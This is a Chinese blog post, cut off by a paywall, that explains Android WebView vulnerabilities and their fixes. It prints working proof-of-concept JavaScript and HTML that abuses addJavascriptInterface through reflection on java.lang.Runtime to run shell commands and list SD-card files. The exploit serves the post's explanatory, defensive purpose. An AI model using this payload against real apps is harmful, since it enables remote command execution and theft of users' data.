Android安全漏洞修复-Webview中的漏洞修复

最新推荐文章于 2024-08-16 10:34:04 发布
最新推荐文章于 2024-08-16 10:34:04 发布
阅读量1.8k 收藏 3
点赞数 1
分类专栏: Android WebView
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liberty_zw/article/details/84591162
版权
本文详细介绍了Android WebView存在的安全问题,包括任意代码执行、密码明文存储和域控制不严格漏洞。重点分析了addJavascriptInterface、searchBoxJavaBridge_等接口引起的远程代码执行风险,并提供了相应的解决方案,如使用@JavascriptInterface注解,以及关闭密码保存提醒,严格控制文件访问权限等。
摘要由CSDN通过智能技术生成

文章目录

项目问题

移动端产品安全漏洞检测报告中指出了很多Android客户端存在的各类安全隐患。其中,使用WebView控件不当导致的漏洞几乎每份报告中都有提及,为此本文将全面的介绍WebView的安全检测报告中提及的漏洞和其他常见的漏洞,以及漏洞的修复方式。

1. 类型

在使用WebView过程中,主要存在的漏洞有三类:

  • 任意代码执行漏洞
  • 密码明文存储漏洞
  • 域控制不严格漏洞

2.具体分析

2.1 WebView 任意代码执行漏洞

出现该漏洞的原因有三个:

  • WebView 中 addJavascriptInterface() 接口
  • WebView 内置导出的searchBoxJavaBridge_对象
  • WebView 内置导出的 accessibility 和accessibilityTraversalObject 对象

2.1.1 addJavascriptInterface 接口引起远程代码执行漏洞

漏洞产生原因
JS调用Android的其中一个方式是通过addJavascriptInterface接口进行对象映射:

// 参数1:Android的本地对象
// 参数2:JS的对象
// 通过对象映射将Android中的本地对象和JS中的对象进行关联,从而实现JS调用Android的对象和方法
webView.addJavascriptInterface(new JSObject(), "myObj");

所以,漏洞产生原因是:当JS拿到Android这个对象后,就可以调用这个Android对象中所有的方法,包括系统类(java.lang.Runtime类),从而进行任意代码执行。如可以执行命令获取本地设备的SD卡中的文件等信息从而造成信息泄露。

具体获取系统类的描述(结合 Java 反射机制):

  • Android中的对象有一公共的方法:getClass();
  • 该方法可以获取到当前类类型Class;
  • 该类有一关键的方法: Class.forName;
  • 该方法可以加载一个类(可加载 java.lang.Runtime 类);
  • 而该类是可以执行本地命令的

以下是攻击的Js核心代码,当APP加载一个外部网页时,攻击者就可以用这段js代码进行漏洞攻击:

function execute(cmdArgs) { 
   // 步骤1:遍历 window 对象
   // 目的是为了找到包含 getClass()的对象
   // 因为Android映射的JS对象也在window中,所以肯定会遍历到
   for (var obj in window) { 
       if ("getClass"in window[obj]) { 
            // 步骤2:利用反射调用forName()得到Runtime类对象
            alert(obj);         
            return window[obj].getClass().forName("java.lang.Runtime") 
            // 步骤3:以后,就可以调用静态方法来执行一些命令,比如访问文件的命令
            getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs); 
            // 从执行命令后返回的输入流中得到字符串,有很严重暴露隐私的危险。
            // 如执行完访问文件的命令之后,就可以得到文件名的信息了。
       } 
   } 
}

为了证明这个漏洞,我们加载一个包含恶意JS代码的本地网页,HTML其代码如下:


<html><head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">  
       <script>  
         var i=0;  
         function getContents(inputStream){  
           var contents = ""+i;  
           var b = inputStream.read();  
           var i = 1;  
           while(b != -1) {  
              var bString = String.fromCharCode(b);  
              contents += bString;  
              contents += "\n"  
              b = inputStream.read();  
          }  
          i=i+1;  
          return contents;
       }  
       
       function execute(cmdArgs)  {  
          for (var obj in window) {  
              console.log(obj);  
              if ("getClass" in window[obj]) {  
                  alert(obj);  
                  return window[obj].getClass().forName("java.lang.Runtime"). 
               getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);  
               }  
           }  
         }   
        var p = execute(["ls","/mnt/sdcard/"]);
最低0.47元/天 解锁文章
Liberty_zw
关注
专栏目录
android_external_chromium-webview
02-27
保持Webview组件的更新对于安全性和兼容性至关重要,因为旧版本可能含有已知漏洞或者不支持最新的Web标准。 4. **构建流程** 构建Chromium-Webview涉及多个步骤:获取源码、配置环境、运行构建脚本、编译源码、...
WebSettings 文档 API 翻译 常用设置
weixin_33904756的博客
07-20 427
代码位置:https://github.com/baiqiantao/WebViewTest.gitWebSettings 介绍public abstract class android.webkit.WebSettings extends Object Manages settings state for a WebView. When a WebView is first created, i...
BiometricPrompt.Builder.setDeviceCredentialAllowed(boolean)方法过时了,怎么破。
u013398960的博客
07-07 1710
BiometricPrompt.Builder.setDeviceCredentialAllowed(boolean)方法过时了,怎么破。
WebView 的常见的安全漏洞
最新发布
challenge51all的专栏
08-16 383
例如,假设一个应用通过 WebView 展示用户生成的评论,如果不对评论内容进行清理和编码,恶意用户可能在评论插入 XSS 脚本。不安全的证书验证:如果 WebView 没有正确验证服务器证书,可能导致与不安全的服务器建立连接,造成数据泄露。输入验证和清理:对用户输入到 WebView 的数据进行严格的验证和清理,去除可能包含的恶意脚本代码。编码输出:对从服务器端传递到 WebView 的数据进行适当的编码,防止恶意脚本的注入。头来限制网页可以加载的资源类型和来源,减少潜在的攻击面。
Android WebView 全面干货指南
Alpha110710的博客
04-11 1520
本篇内容转自 無名小子的杂货铺https://www.jianshu.com/p/fd61e8f4049e前言总结 Android WebView 常用的相关知识点,令包含以下干货内容分析:Js注入漏洞WebView 遇到的坑、JsBridge 原理以及框架使用(JsBridge,DSBridge-Android)、缓存机制应用、性能优化、腾讯开源框架 VasSonic (之后会进行代码分析)。...
Spring boot 注解@Async不生效 不起作用
qq_41665121的博客
11-12 1998
今天在做公司项目时,想要使用异步调用去处理方法。于是我把注解@Async 加到了自己一个方法上,后来发现并没有生效。 检查代码: @SpringBootApplication启动类当已经添加@EnableAsync注解 可能应该是因为aop代理的缘故,被调用方法 和 调用处的代码都处在同一个类,所以只是相当于本类调用,并没有使用代理类 从而@Async并没有产生效果。 于是单独创建一个类调用@Async处理的方法,还是不行 @Async注解的实现都是基于Spring的AOP,后面创建的类也必须用
Android_UI:WebView
Java技术博客,不再更新Android内容
08-19 1024
WebView 根据url加载数据 相关的类: WebView WebViewClient:很多重写方法 WebSettings:设置字体大小 Demo: 先显示进度条,当webview数据加载完成后,再把进度条隐藏。 注意加网络访问权限。 布局:activity_main.xml<RelativeLayout xmlns:android="http://schemas.android
Android_WebView安全攻防指南2020.pdf
08-11
- **更新Chromium内核**:保持WebView组件的最新状态,以便修复已知的安全漏洞。 - **限制Cookie使用**:谨慎处理Cookie,防止敏感信息泄露或被利用进行跨站请求伪造(CSRF)攻击。 5. **总结** Android开发者...
AndroidWebView安全漏洞解决方案.docx
10-26
**CNNVD 描述**:Google Android API 在 16.0 及之前的版本存在安全漏洞,未正确限制 WebView 的 `addJavascriptInterface` 方法,允许远程攻击者通过载入特制 JavaScript 代码执行任意 Java 对象的方法。...
信息安全_android漏洞检测动态分析.pptx
08-14
Android 漏洞检测与动态分析】 在移动安全领域,Android 应用程序的安全性至关重要。随着移动互联网的快速发展,各类应用程序如...通过结合多种工具和技术,可以更有效地发现和修复Android应用安全漏洞
Android Webview UXSS 漏洞攻防.pdf
09-18
标题提到的“Android Webview UXSS漏洞攻防”指的是在Android移动操作系统使用WebView组件时,所面临的一个特定的安全漏洞问题——UXSS(通用型跨站脚本攻击)。UXSS漏洞可以被攻击者利用,从而在用户不经意间...
Android静态安全检测 -> WebView明文存储密码
4lwin博客
06-16 9329
WebView明文存储密码 - WebSettings.setSavePassword方法 1. API 继承关系 java.lang.Object android.webkit.WebSettings 主要方法 setJavaScriptEnabled(boolean flag):是否支持js setPluginsEnabled(
WebView(三)—— WebView使用漏洞
xingyu19911016的博客
11-15 2558
WebView使用漏洞 WebView,主要漏洞有三类: 任意代码执行漏洞 密码明文存储漏洞 域控制不严格漏洞 1 任意代码执行漏洞 JS调用Android代码是通过addJavascriptInterface接口进行对象映射。 1.1 漏洞产生的原因 // java代码 public class AndroidJS extends Object { @JavascriptInterface public void hello(String msg) { System
Android WebView安全方面的一些坑
yy1715713348的博客
01-16 1118
公司一款app有将近两年没有更新了,虽然用户量不大,但是因为与第三方有合作,出现问题时需要进行维护;没想到最近第三方对他们所有的软件进行了网络安全扫描,这款也未能幸免…因为app是13年左右开发的,维护也只是到16、17年左右就终止了,所以,扫描出不少漏洞;因为是采用了混合开发,因此,需要解决一些webview
android web安全问题,Android WebView常见的安全漏洞和解决方案
weixin_29184371的博客
05-26 913
概述WebView安全漏洞有三种,分别是:远程代码执行漏洞密码明文存储漏洞域控制不严格漏洞下面依次分析各漏洞产生的原因以及解决方案一、远程代码执行漏洞1、WbViewaddJavascriptInterface()接口产生原因:Android API level 17以及之前的系统版本,由于程序没有正确限制使用addJavascriptInterface方法,远程攻击者可通过使用Java Re...
WebView使用漏洞
qq_39431405的博客
02-07 979
webview使用漏洞
[车联网安全自学篇] Android安全WebView攻防「基础篇」
橙留香Park的博客
04-15 617
也许每个人出生的时候都以为这世界都是为他一个人而存在的,当他发现自己错的时候,他便开始长大少走了弯路,也就错过了风景,无论如何,感谢经历开局啰嗦一句:本篇是基础篇,进阶篇需要等一段时间,涉及知识点太多,脑壳有点看不懂,准备先学其它知识点,后面再补WebView攻防「进阶篇」。本文将介绍 WebView 的基础知识,和使用不当会造成的一些安全隐患,以及如何发现及缓解这些安全隐患,后续的WebView攻防「进阶篇」会更详细的介绍相关攻击以及案例样本复现方式,更加方便同学们对Android 渗透测试的理解在And
AndroidWebView安全
laymenISmouse的专栏
01-30 824
本地攻击 (1)Content Provider SQL注入、实现openFile函数导致目录遍历 (2)Activity的导出、劫持问题 私有组件错误导出 (3)SQLite数据库 SQL注入、load_extension代码执行 1.WebView安全 Android内置用于显示Web内容的控件。除用于 实现Web浏览器之外...
Android WebView远程代码执行漏洞详解与影响
本文将深入探讨AndroidWebView远程代码执行漏洞这一关键安全问题。Android API级别16及以下版本由于缺乏有效的安全防护措施,存在一个显著漏洞,即WebView.addJavascriptInterface方法的滥用可能导致远程攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值